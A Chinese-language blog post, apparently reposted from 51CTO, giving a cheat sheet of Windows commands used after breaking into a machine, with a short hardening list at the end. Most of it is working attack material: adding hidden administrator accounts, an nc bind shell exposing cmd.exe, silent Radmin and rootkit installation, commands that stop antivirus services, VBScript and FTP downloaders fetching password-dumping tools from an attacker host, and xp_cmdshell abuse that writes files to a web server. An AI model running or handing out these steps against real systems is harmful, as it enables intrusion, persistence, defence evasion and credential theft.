(1) 運作cmd指令
l 通過在“運作”菜單中執行cmd或者command指令。
l 通過程式的附件執行“指令提示符”
l 直接在反彈的shell中(一般是遠端控制軟體中)
說明:在有些情況下,管理者對cmd指令進行了限制,這就需要更換cmd.exe為其它一個名字,或者從本地上傳一個檔案上去。
(2) 建立目錄:mkdir test
(3) 更換目前路徑:cd test
(4) 生成檔案:netstat –an >netlog.txt
(5) 檢視檔案屬性:dir /a /s
(6) 查找指定網絡連接配接:netstat –an |find “80” /3389
(7) 給檔案加上/還原屬性:attrib –h-s-r-a
(8) 建立新檔案夾: mkdir hacker
(9) 移動檔案netlog.txt到hacker檔案夾
l move netlog.txt c:hacker\
l move netlog.txt c:\test\hacker\
(10)添加新管理者hacker
net user hacker wshacker /add
net localgroup administrators hacker /add
net user hacker
net user hacker wshakcer!!
(11)使用nc指令
l 監聽指令
netstat –an |find “8080”
nc -vv -l -p 8080 / nc -vv -l -p 8080
nc -l -p port>log.txt
l 程式定向
nc -l -p 5277 -t -e cmd.exe
在對方機器上運作,使其成為一台telnet伺服器.
l 掃描對方端口
nc -v -ip port
eg nc -v 172.16.81.1 80
l 掃描對方tcp端口
nc -v -z ip port -port
l 掃描對方udp端口
nc -v -z -u ip port-port
l 上傳檔案
本地機器上執行:nc -v -n ip port<x:\svr.exe
遠端機器上執行:nc -v -l -p port >y:\svr.exe
(12)檢視系統時間:net time net view /net session /net use
(13)使用at指令:
at 檢視目前所有清單
at 9:01 “net user aspnet wshakcer /add ”
net time
說明該指令一般是配合net time指令使用
(14)檢視遠端終端連接配接情況:query user /quser
(15)登出遠端終端使用者:logoff 1/2/3
(16)指令模式安裝radmin遠端控制軟體
前提:将radmin的三個服務端檔案(admdll.dll,raddrv.dll,r_server.exe)放入一個檔案夾,并且已經獲得了被入侵機器的管理者密碼。
copy *.* \\192.168.45.219\admin$\system32\
然後執行指令:
netstat -an |find "4899"
net stop r_server
r_server.exe /pass:wshacker /port:4899 /save /silence
r_server.exe /install /silence
net start r_server
(17)安裝rootkit
将ntboot.exe ntboot.dll拷入系統目錄,然後執行ntboot –install指令,rootkit對80端口有效,尤其對提供web服務的端口。
用戶端調用比較簡單:
cli->ip位址->80端口
(18)停止和啟動服務。
Net stop /net start “服務名稱”
以下指令停止防毒軟體
net stop "Symantec AntiVirus"
net stop "Symantec AntiVirus Definition Watcher"
net stop "Symantec Event Manager"
net stop "Symantec Settings Manager"
net stop "System Event Notification"
(19)擷取網絡配置情況:ipconfig /all
(20)使用腳本下載下傳
echo open 192.168.45.219>b
echo ftp>>b
echo bin>>b
echo get radmin.exe>>b(可以是一系列的可執行檔案)
echo bye >>b
ftp -s:b
del b
echo open 192.168.45.219 >1
echo user bin bin >>1
echo bin >>1
echo get wt.exe >>1
echo bye >>1
ftp -n -s:1
del 1
(21)dl.vbe
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe
cscript dl.vbe [url]http://192.168.45.219/tools/AdmDll.dll[/url] AdmDll.dll
cscript dl.vbe [url]http://192.168.45.219/tools/raddrv.dll[/url] raddrv.dll
cscript dl.vbe [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe
cscript dl.vbe [url]http://192.168.45.219/tools//mt.exe[/url] mt.exe
cscript dl.vbe [url]http://192.168.45.219/tools/wt.exe[/url] wt.exe
(22). iget.vbe
net stop "RsRavMon Service"
net stop "Rising Personal Firewall Service"
net stop "Rising Process Communication Center"
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
echo Set xPost = createObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = createObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe
dir iget.vbs
cscript iget.vbe [url]http://192.168.45.219/tools/AdmDll.dll[/url] AdmDll.dll
cscript iget.vbe [url]http://192.168.45.219/tools/raddrv.dll[/url] raddrv.dll
cscript iget.vbe [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe
cscript iget.vbe [url]http://192.168.45.219/tools/mt.exe[/url] mt.exe
cscript iget.vbe [url]http://192.168.45.219/tools/wt.exe[/url] wt.exe
cscript iget.vbe [url]http://192.168.45.219/tools/ntboot.exe[/url] ntboot.exe
cscript iget.vbe [url]http://192.168.45.219/tools/ntboot.dll[/url] ntboot.dll
cscript iget.vbe [url]http://192.168.45.219/tools/server.exe[/url] server.exe
cscript iget.vbe [url]http://192.168.45.219/tools/lsaext.dll[/url] lsaext.dll
cscript iget.vbe [url]http://192.168.45.219/tools/PwD.exe[/url] PwD.exe
cscript iget.vbe [url]http://192.168.45.219/tools/sfind.exe[/url] sfind.exe
cscript iget.vbe [url]http://192.168.45.219/tools/fp.exe[/url] fp.exe
cscript iget.vbe [url]http://192.168.45.219/tools/pulist.exe[/url] pulist.exe
cscript iget.vbe [url]http://192.168.45.219/tools/pskill.exe[/url] pskill.exe
(23)使用軟體下載下傳
wt down [url]http://192.168.45.219/tools/AdmDll.dll[/url]
wt down [url]http://192.168.45.219/tools/regsrc.exe[/url]
wt down [url]http://192.168.45.219/tools/raddrv.dll[/url]
mt -netget [url]http://192.168.45.219/tools/ntboot.dll[/url] ntboot.dll
mt -netget [url]http://192.168.45.219/tools/ntboot.exe[/url] ntboot.exe
mt -netget [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe
mt -netget [url]http://192.168.45.219/tools/PwD.exe[/url] PwD.exe
(24)在網站上複制檔案
copy c:\tmp\*.exe c:\winnt\system32\inetsrv\data\
使用網頁木馬的檔案上傳功能。
(25)使用SQL Server 2000的xp_cmdshell
exec master.dbo.xp_cmdshell ‘指令’ --執行指令
use master –使用哪一個資料
exec master.dbo.xp_cmdshell 'net user aspnet wshacker /add'
exec master.dbo.xp_cmdshell 'net localgroup administrators asp2net /add'将腳本通過網頁送出
exec xp_cmdshell 'echo set fso1=createobject("scripting.filesystemobject")>c:\read.vbs'
exec xp_cmdshell 'echo Set WshShell = Wscript.CreateObject("Wscript.Shell")>>c:\read.vbs'
exec xp_cmdshell 'echo spa=WshShell.Environment("process")("windir") >>c:\read.vbs'
exec xp_cmdshell 'echo set fil =fso1.opentextfile(spa & "\system32\aa.txt") >>c:\read.vbs'
exec xp_cmdshell 'echo do while not fil.atendofstream>>c:\read.vbs'
exec xp_cmdshell 'echo nr=fil.readline>>c:\read.vbs'
exec xp_cmdshell 'echo if left(nr,4)="Path" then>>c:\read.vbs'
exec xp_cmdshell 'echo pa=mid(nr,instr(nr,")")+3,len(nr)-instr(nr,")")-3)>>c:\read.vbs'
exec xp_cmdshell 'echo exit do>>c:\read.vbs'
exec xp_cmdshell 'echo end if>>c:\read.vbs'
exec xp_cmdshell 'echo loop>>c:\read.vbs'
exec xp_cmdshell 'echo set fil1 =fso1.opentextfile(pa&"\dd.asp",2,true)>>c:\read.vbs'
exec xp_cmdshell 'echo fil1.writeline "<%response.write request.servervariables(""APPL_PHYSICAL_PATH"")%>">>c:\read.vbs'
(26)查找使用者的密碼:
l 使用pulist.exe檢視使用者的程序,找到winlogon的PID.
l 然後運作findpass.exe 域名(機器名) 使用者名 PID
例如: findpass.exe a administrator 204
mt –findpass
[url]ftp://192.168.99.254[/url]
(27)使用ps
l 顯示所有程序
ps /a
dir *.exe>exeback.txt & dir *.dll>dllback.txt
ps.exe /a /m >nowdlls.txt
(28)壓縮檔案
rar a -r myrar d:\sinba
(29)計算機管理控制台程式
compmgmt.exe
dcomcnfg.exe 元件服務程式
devmgmt.exe 裝置管理器程式
fsmgmt.exe 共享檔案管理
lusrmgr.msc 本地使用者群組
eventvwr.msc 日志管理器
ht檔案
ht -fku
ht -key mima
ht -ps
htk -fku
htk -key 218123409252
htk -ps
htk -pslist
htk -pass
htk -fpass
htk -pss 192.168.1.6
htk -s 192.168.1.6 -show -run
htk -share -add 211.72.212.81 admin$
htk -share -add 211.72.50.10 admin$
安全防護
(1) 檢視運作服務與端口
fport /p
(2)檢視開放的檔案及其程序
handle.exe([url]http://www.sysinternals.com/ntw2k/freeware/handle.shtml.[/url])
handle -p iexplore handle
(3)進行登陸等時間的審計(gpedit)
(4)嚴格安全日志的管理(應用程式日志、系統日志、安全時間日志)
嚴格限制%SystemRoot%\system32\config目錄通路權限,僅限管理者通路
eventvwr.msc更改日志檔案的預設大小
(5)去掉預設檔案共享
HKey_Local_Machine\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
建立DWORD鍵“AutoShareServer”值為0
net share
(6)加密使用者所在檔案的臨時目錄temp
C:\Documents and Settings\<username>\Local Settings
(7)清楚頁面檔案
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management 将ClearPageFileAtShutdown鍵值設定為1
(8)嚴格控制應用程式的通路權限
使用win2000 資源AppSec
本文轉自 simeon2005 51CTO部落格,原文連結:http://blog.51cto.com/simeon/46571